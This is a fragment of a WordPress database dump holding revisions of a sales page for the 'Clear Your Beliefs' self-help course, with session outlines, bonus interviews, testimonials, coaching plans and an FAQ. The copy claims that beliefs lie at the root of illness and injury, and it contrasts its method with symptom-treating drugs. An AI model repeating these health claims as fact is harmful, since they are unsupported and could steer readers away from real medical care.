class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this bonus interview with internationally acclaimed author and teacher Anodea Judith.  Anodea is one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and <em>The BeliefCloset Process</em> was developed for their workshop on manifestation, taught around the world to over 1,000 people.\r\n\r\n</div>\r\n<div class="module_body">Their book is a step-by-step manual for turning any dream into a reality by taking any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 19:00:49', '2014-06-18 00:00:49', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(983, 2, '2014-06-17 20:07:36', '2014-06-18 01:07:36', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	